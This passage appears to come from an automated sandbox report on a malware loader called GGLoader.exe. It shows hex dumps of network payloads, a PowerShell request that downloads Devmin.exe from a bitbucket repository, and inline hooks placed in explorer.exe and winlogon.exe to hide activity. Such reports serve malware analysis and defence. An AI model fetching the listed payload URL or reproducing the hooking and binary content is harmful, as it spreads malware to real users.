                                                                                                  Data Ascii: t)tu{t}u@VPl~L?bE;Ft48\u,H;Nt$u(t)tu{t}u@?uE>{V;t68\u.H;t'VPu(t)tu{t}u@"jhj#=
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: 00 10 00 00 ff 75 08 8b 40 04 8b 4c 30 38 8b 01 8b 40 20 ff d0 89 46 08 89 56 0c 3d 00 10 00 00 75 04 85 d2 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 64 fb fe ff b8 c2 3e 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 2e fb fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 83 61 04 00 8b c1 83 61 08 00 c7 41 04 78 52 43 00 c7 01 70 52 43 00 c3 55 8b ec 56 ff 75 08 8b f1 e8 39 db fe ff c7 06 98 52 43 00 8b c6 5e 5d c2 04 00 55 8b ec 51 56 ff 75 08 8b f1 89 75 fc e8 4a ef fe
                                                                                                  Data Ascii: u@L08@ FV=ut<5Mjp3V9N8EPd>Au}EjHQ39y8EP.E@L08tPMdY_^[]aaAxRCpRCUVu9RC^]UQVuuJ
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: ff 0f b6 4e e8 0f b6 42 e8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 da fa ff ff 0f b6 4e e9 0f b6 42 e9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 fa ff ff 8b 46 ea 3b 42 ea 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ea 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 8b fa ff ff 0f b6 4e eb 0f b6 42 eb 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 69 fa ff ff 0f b6 4e ec 0f b6 42 ec 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 47 fa ff ff 0f b6 4e ed 0f b6 42 ed 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 25 fa ff ff 8b 46 ee 3b 42 ee 0f 84 87 00 00 00 0f b6 c8 0f b6 42 ee 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9
                                                                                                  Data Ascii: NB+t3ENB+t3EF;BB+t3ENB+t3EiNB+t3EGNB+t3E%F;BB+t3E
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: c2 04 00 8b ff 56 8b f1 57 83 46 10 04 8b 46 10 8b 78 fc e8 5c 8b 00 00 85 c0 75 24 8b 46 08 c6 40 1c 01 c7 40 18 16 00 00 00 33 c0 ff 76 08 50 50 50 50 50 e8 d3 de ff ff 83 c4 18 32 c0 eb 44 ff 76 28 e8 ee fc ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 be 8b 46 14 99 89 07 89 57 04 eb 15 8b 46 14 89 07 eb 0e 66 8b 46 14 66 89 07 eb 05 8a 46 14 88 07 c6 46 2c 01 b0 01 5f 5e c3 8b 51 1c 8b c2 c1 e8 05 a8 01 74 09 81 ca 80 00 00 00 89 51 1c 6a 00 e8 28 eb ff ff c3 6a 01 c7 41 24 08 00 00 00 c7 41 28 0a 00 00 00 e8 0c ee ff ff c3 8b ff 53 56 8b f1 57 83 46 10 04 8b 46 10 8b 5e 24 8b 78 fc 89 7e 30 83 fb ff 75 05 bb ff ff ff 7f ff 76 28 0f b6 46 2d 50 ff 76 04 ff 36 e8 80 e8 ff ff 83 c4 10 84 c0 74 19 85 ff 75 08 bf b8 72 43 00 89 7e
                                                                                                  Data Ascii: VWFFx\u$F@@3vPPPPP2Dv(Yt+tHtuFWFfFfFF,_^QtQj(jA$A(SVWFF^$x~0uv(F-Pv6turC~
                                                                                                  2024-10-04 17:13:20 UTC16384INData Raw: f4 64 a3 00 00 00 00 83 7d 10 00 75 12 e8 96 00 00 00 84 c0 74 09 ff 75 08 e8 ef 00 00 00 59 8d 45 0c c6 45 f3 00 89 45 dc 8d 45 10 89 45 e0 8d 45 f3 89 45 e4 83 65 fc 00 8d 4d f2 6a 02 58 89 45 ec 89 45 e8 8d 45 ec 50 8d 45 dc 50 8d 45 e8 50 e8 52 fe ff ff 83 7d 10 00 74 0d 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 ff 75 08 e8 06 00 00 00 cc cc cc cc cc cc 8b ff 55 8b ec e8 6a 00 00 00 84 c0 74 10 ff 75 08 ff 15 e8 50 43 00 50 ff 15 ec 50 43 00 ff 75 08 e8 70 00 00 00 59 ff 75 08 ff 15 28 51 43 00 cc 6a 00 ff 15 44 50 43 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 e8 65 b3 00 00 83 f8 01 74 15 64 8b 0d 30 00 00 00 8b 49 68
                                                                                                  Data Ascii: d}utuYEEEEEEEeMjXEEEPEPEPR}tMdYuUjtuPCPPCupYu(QCjDPCt4MZf9u*H<9PEuf9Auytvt2etd0Ih


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449732185.166.143.494437520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-04 17:13:21 UTC121OUTGET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
                                                                                                  2024-10-04 17:13:22 UTC4031INHTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:21 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 2330112
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Tue, 10 Jan 2023 15:00:12 GMT
                                                                                                  Etag: "5d17badb31672756832ca3e395738d26"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: cb62c73099d7
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 4073
                                                                                                  X-Render-Time: 0.11316585540771484
                                                                                                  X-B3-Traceid: 68d6a1992b57491e8ef54a649dae1565
                                                                                                  X-B3-Spanid: 7211b4316c76bfda
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com ap [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 956903.684
                                                                                                  X-Usage-Request-Cost: 39115.60
                                                                                                  X-Usage-User-Time: 0.069521
                                                                                                  X-Usage-System-Time: 0.005947
                                                                                                  X-Usage-Input-Ops: 4392
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 0
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: MISS
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 68d6a1992b57491e8ef54a649dae1565
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=223,atl-edge-internal;dur=2,atl-edge-upstream;dur=222,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:22 UTC12353INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b3 73 bd 63 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 f4 00 00 00 8a 23 00 00 0e 00 00 e0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 24 00 00 04 00 00 4c 1e 24 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                  Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdsc.&#@$L$`
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 07 c6 06 01 e8 66 67 00 00 48 89 d8 48 83 c4 38 5b 5e c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 56 53 48 83 ec 38 66 0f 6f 05 d2 27 23 00 48 8d 0d 6b 08 01 00 0f 29 44 24 20 e8 f1 6f 00 00 48 8d 0d 3a 08 01 00 48 89 c6 e8 e2 6f 00 00 80 3e 00 48 89 c3 75 2a c6 40 10 01 48 8b 44 24 20 45 31 c0 48 89 da 48 8d 0d a4 c3 00 00 48 89 03 48 8b 44 24 28 48 89 43 08 c6 06 01 e8 f0 66 00 00 48 89 d8 48 83 c4 38 5b 5e c3 66 0f 1f 44 00 00 56 53 48 83 ec 38 48 8b 05 73 27 23 00 48 8d 0d bc 07 01 00 48 89 44 24 20 8b 05 11 24 23 00 89 44 24 28 e8 78 6f 00 00 48 8d 0d 81 07 01 00 48 89 c6 e8 69 6f 00 00 80 3e 00 48 89 c3 75 28 c6 40 0c 01 48 8b 44 24 20 45 31 c0 48 89 da 48 8d 0d eb c2 00 00 48 89 03 8b 44 24 28 89 43 08 c6 06 01 e8 79 66 00 00 48 89 d8 48 83 c4 38 5b 5e
                                                                                                  Data Ascii: fgHH8[^ff.VSH8fo'#Hk)D$ oH:Ho>Hu*@HD$ E1HHHHD$(HCfHH8[^fDVSH8Hs'#HHD$ $#D$(xoHHio>Hu(@HD$ E1HHHD$(CyfHH8[^
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: ff ff ff ff 48 c7 84 24 e8 00 00 00 00 00 00 00 e8 6c 19 00 00 4c 89 e0 f3 0f 7e 84 24 f0 00 00 00 49 c7 44 24 10 00 00 00 00 0f 16 84 24 f8 00 00 00 41 0f 11 04 24 0f 28 b4 24 80 05 01 00 0f 28 bc 24 90 05 01 00 44 0f 28 84 24 a0 05 01 00 48 81 c4 b8 05 01 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 e8 c3 2f 00 00 41 b9 ff 47 00 00 45 31 c0 c6 40 0a 01 48 8d 0d 4f 86 00 00 48 89 c3 48 8b 84 24 80 05 00 00 66 44 89 4b 08 48 89 da 48 89 03 c6 06 01 e8 d1 26 00 00 e9 2c fb ff ff 0f 1f 40 00 41 8b 45 38 4d 85 f6 49 8b 7d 40 66 0f 6e e0 89 84 24 8c 00 00 00 48 89 7c 24 68 66 0f c5 dc 01 0f 85 90 fb ff ff 41 89 f6 66 48 0f 6e f5 e9 b7 fb ff ff 0f 1f 44 00 00 44 8b 84 24 ac 00 00 00 49 89 d9 b9 05 00 00 00 48 8b 94 24 b0 00 00 00 e8 09 19 00 00 85 c0 0f
                                                                                                  Data Ascii: H$lL~$ID$$A$($($D($H[^_]A\A]A^A_/AGE1@HOHH$fDKHH&,@AE8MI}@fn$H|$hfAfHnDD$IH$
                                                                                                  2024-10-04 17:13:22 UTC11271INData Raw: 39 e7 0f 85 f5 fe ff ff 45 85 ed 0f 84 ec fe ff ff 41 c6 04 24 30 49 83 c4 01 e9 de fe ff ff 41 83 e2 40 4c 89 e6 0f 84 50 ff ff ff 48 83 c6 01 41 c6 04 24 20 e9 42 ff ff ff 0f 1f 44 00 00 41 83 eb 01 45 85 ed 44 89 5b 0c 0f 89 da fe ff ff 44 89 d0 25 00 06 00 00 3d 00 02 00 00 0f 85 c7 fe ff ff 8b 53 0c 8d 42 ff 85 d2 89 43 0c 0f 8e eb fe ff ff 89 c1 4c 89 e0 49 8d 54 0c 01 90 48 83 c0 01 c6 40 ff 30 48 39 d0 75 f3 4d 8d 64 0c 01 c7 43 0c ff ff ff ff e9 c2 fe ff ff 66 90 57 56 53 48 83 ec 20 4c 89 ce 49 89 d2 45 8d 48 ff 41 b8 67 66 66 66 44 89 c8 49 63 d9 41 c1 f9 1f 41 f7 e8 41 89 d0 41 c1 f8 02 45 29 c8 41 b9 01 00 00 00 74 23 41 bb 67 66 66 66 0f 1f 40 00 44 89 c0 41 c1 f8 1f 41 83 c1 01 41 f7 eb c1 fa 02 44 29 c2 41 89 d0 75 e7 8b 46 2c 83 f8 ff 75
                                                                                                  Data Ascii: 9EA$0IA@LPHA$ BDAED[D%=SBCLITH@0H9uMdCfWVSH LIEHAgfffDIcAAAAE)At#Agfff@DAAAD)AuF,u
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: f7 ff ff 66 0f 2e c6 48 8b 44 24 40 48 89 ca 7a 06 0f 84 36 04 00 00 41 8d 4b 01 41 b8 10 00 00 00 eb 08 0f 1f 44 00 00 4c 89 ca 80 7a ff 30 4c 8d 4a ff 74 f3 48 89 54 24 40 89 4c 24 2c e9 a4 f6 ff ff 44 8b 4c 24 38 48 89 f0 89 5c 24 50 4c 8d 70 01 48 89 74 24 30 48 8b b4 24 f8 00 00 00 4c 89 f3 45 85 c9 0f 84 f0 01 00 00 41 83 7f 14 01 0f 8e 63 03 00 00 83 7c 24 38 02 0f 84 21 02 00 00 48 8b 5c 24 30 eb 49 41 88 7e ff 45 31 c0 4c 89 e1 ba 0a 00 00 00 e8 cb 07 00 00 4d 39 e5 4c 89 f9 ba 0a 00 00 00 4c 0f 44 e8 45 31 c0 48 89 c3 e8 b1 07 00 00 48 89 ea 49 89 dc 48 89 c1 49 89 c7 4c 89 f3 e8 cd eb ff ff 49 83 c6 01 8d 78 30 4c 89 e2 48 89 e9 e8 2b 0c 00 00 85 c0 7f a8 83 ff 39 48 89 5c 24 30 4c 89 f3 0f 84 c2 01 00 00 4d 89 ee 83 c7 01 4d 89 e5 41 b8 20 00
                                                                                                  Data Ascii: f.HD$@Hz6AKADLz0LJtHT$@L$,DL$8H\$PLpHt$0H$LEAc|$8!H\$0IA~E1LM9LLDE1HHIHILIx0LH+9H\$0LMMA
                                                                                                  2024-10-04 17:13:22 UTC8768INData Raw: d4 79 12 71 22 49 13 00 43 f9 b6 e9 8d 23 56 9d f0 79 2e 71 13 49 78 00 0a f9 94 e9 bd 23 60 9d f0 79 20 71 35 49 21 00 09 f9 be e9 8f 23 15 9d f5 79 2d 71 3d 49 26 00 0e f9 81 e9 82 23 54 9d ac 79 20 71 0b 49 2e 00 2f f9 d6 e9 db 23 4e 9d d3 79 09 71 01 49 3e 00 0e f9 b1 e9 85 23 6b 9d ea 79 48 71 0b 49 19 00 4f f9 ad e9 d0 23 7a 9d e5 79 38 71 17 49 2f 00 19 f9 92 e9 db 23 51 9d f5 79 32 71 21 49 28 00 10 f9 bf e9 ae 23 11 9d af 79 3c 71 13 49 0a 00 4e f9 9c e9 be 23 4b 9d d3 79 23 71 25 49 13 00 4c f9 94 e9 81 23 7b 9d d6 79 37 71 22 49 38 00 0a f9 be e9 da 23 5a 9d e4 79 2a 71 40 49 38 00 4c f9 8e e9 b9 23 44 9d ec 79 01 71 25 49 2f 00 19 f9 9b e9 c6 23 10 9d d9 79 3c 71 30 49 7c 00 2c f9 88 e9 b1 23 6a 9d a5 79 2f 71 1b 49 3f 00 2e f9 ab e9 d8 23 60
                                                                                                  Data Ascii: yq"IC#Vy.qIx#`y q5I!#y-q=I&#Ty qI./#NyqI>#kyHqIO#zy8qI/#Qy2q!I(#y<qIN#Ky#q%IL#{y7q"I8#Zy*q@I8L#Dyq%I/#y<q0I|,#jy/qI?.#`
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 00 00
                                                                                                  Data Ascii: <
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 62 7e 6e 49 e8 6c 70 66 77 76 4b 6a 6a 63 64 71 6e 68 6f 0a 56 6f 76 63 4d 51 78 74 6f 54 73 01 65 6d 69 63 12 44 7a 66 61 79 4b 6b 6a 63 64 71 6f 68 6e 65 7d 47 53 69 65 7f 06 57 65 78 7f 61 62 13 4a 69 68 66 67 70 73 79 4b 72 6a 63 64 4f 68 68 6d 0a 56 6f 76 63 4d 51 78 74 6f 54 73 01 65 6d 69 63 12 7d 7a 4e 47 73 63 69 42 6b 62 62 60 6a 6c 65 7e 78 60 7b 6f 5d 69 74 65 7e 59 4a 79 66 17 4a 68 6c 7a 4e 45 73 63 69 47 49 73 69 70 59 67 74 77 6f 5e 4b 65 75 72 65 6c 50 7f 72 68 67 41 4b 68 6c 7a 18 42 73 63 69 14 40 62 62 6c 51 75 74 75 69 5b 6f 16 78 78 74 6f 02 5d 78 68 6d 63 73 46 68 6f 16 4a 71 7c 2b 79 6f 73 6e 4e 71 67 74 73 7c 7b 78 69 f8 61 74 65 79 63 63 65 7c 65 41 4f 6c 70 6c 70 7e 72 6f 42 4b 62 62 6c 68 6a 65 79 47 7c 69 65 7f 21 65 6e 50 5c
                                                                                                  Data Ascii: b~nIlpfwvKjjcdqnhoVovcMQxtoTsemicDzfayKkjcdqohne}GSieWexabJihfgpsyKrjcdOhhmVovcMQxtoTsemic}zNGsciBkbb`jle~x`{o]ite~YJyfJhlzNEsciGIsipYgtwo^KeurelPrhgAKhlzBsci@bblQutui[oxxto]xhmcsFhoJq|+yosnNqgts|{xiateycce|eAOlplp~roBKbblhjeyG|ie!enP\
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 70 75 b7 e0 53 65 68 b3 42 76 c0 58 34 f5 76 ee 9c b3 19 35 7f 29 3c 59 10 d0 59 d4 7f 9f 7e 64 6c 19 85 d3 ba 45 72 e2 98 fc c3 9d 7b 8c b6 7d c1 68 6c 61 fb ca df b5 32 8d f1 41 51 12 94 7a 78 8b 79 33 ea b2 27 4a 54 da 75 b8 b0 a0 89 e5 e8 ba a3 11 98 13 36 a2 49 b4 a0 c4 8f 3c 28 e8 72 e1 6a d3 d6 e0 6f dc 8e 58 d8 b5 4e 25 8f 57 94 31 5d f3 8e 06 6f 7a 40 ee 54 a8 66 fd fb 44 cc 19 25 fd c8 bb ab e2 db fd 6b 2d 87 37 c2 34 cf df dd ad b1 3f 31 6d 8f 92 79 dd 7d 04 18 a0 25 7f bf 5d 54 7c 65 9a 6b dc 70 e8 43 f3 e6 e0 eb 6d b9 17 9f e5 97 0d 2a 57 3e bd 26 37 4d db ee 52 82 cb c3 4c b9 b1 63 1d d5 bc 95 61 53 0b a7 57 56 6d a2 c2 5d ef c4 50 9c 54 f3 6f 39 6e 39 dd 33 2c 18 be 13 52 28 54 ab 07 3b b4 b0 60 f5 d5 b6 d0 10 f7 33 f6 e0 c9 59 1d b7 b3 35
                                                                                                  Data Ascii: puSehBvX4v5)<YY~dlEr{}hla2AQzxy3'JTu6I<(rjoXN%W1]oz@TfD%k-74?1my}%]T|ekpCm*W>&7MRLcaSWVm]PTo9n93,R(T;`3Y5
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: e5 16 33 ce 1c a5 cd b4 2e e8 64 08 66 c5 c2 a8 e9 b1 4d ac a6 93 e3 f4 3b b1 bd e0 fa 8f af 5a b0 03 f9 b7 04 6c 85 6c 2e ff cc a1 d3 e6 32 3f 0f d3 24 f4 a8 09 b3 9d b0 91 33 f3 3a 8c c7 4f 82 31 9a d4 85 d9 71 e8 2b 53 c4 1d c3 db bd bc 8e 75 b4 ef 3a 09 f5 af 32 e3 8b 7a f8 18 f8 83 f4 af b8 25 8e 91 e4 a9 f8 f6 3e fe 01 51 d7 83 3e c8 08 f9 e6 88 99 ca 86 71 eb 4a 59 77 33 40 58 bc 51 09 b2 0f 15 7e bb f9 8a 40 2a 94 f1 79 12 bb d2 4a f8 a9 d0 bf b2 1a 40 1b 7e 98 2a 4b 69 d4 a4 81 e9 86 b4 93 7d b9 82 e8 de 45 f8 8f ca 22 ae 18 c6 0f 29 bc b9 a6 29 fc 5c 91 34 cf 8c 3e 7e af 5f a7 e3 5d ee 13 6a e1 c9 5d 91 2a ba 90 b0 b0 20 6f cd c3 97 df 06 25 54 cb 97 e7 51 07 db 66 f3 8e ef 6b 29 bc 55 22 02 87 26 4d bd 90 d8 40 9d be 1f c2 79 0c fe 08 d7 e1 3b
                                                                                                  Data Ascii: 3.dfM;Zll.2?$3:O1q+Su:2z%>Q>qJYw3@XQ~@*yJ@~*Ki}E"))\4>~_]j]* o%TQfk)U"&M@y;


                                                                                                  Code Manipulations

                                                                                                  User Modules

                                                                                                  Hook Summary

                                                                                                  Function NameHook TypeActive in Processes
                                                                                                  ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                  NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                  NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                  RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                  NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                                                  Processes

                                                                                                  Process: explorer.exe, Module: ntdll.dll
                                                                                                  Function NameHook TypeNew Data
                                                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  Process: winlogon.exe, Module: ntdll.dll
                                                                                                  Function NameHook TypeNew Data
                                                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:13:13:11
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\Desktop\GGLoader.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\GGLoader.exe"
                                                                                                  Imagebase:0xfd0000
                                                                                                  File size:19'456 bytes
                                                                                                  MD5 hash:982E4AE4559538CFB529DFAFF0507880
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:13:13:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
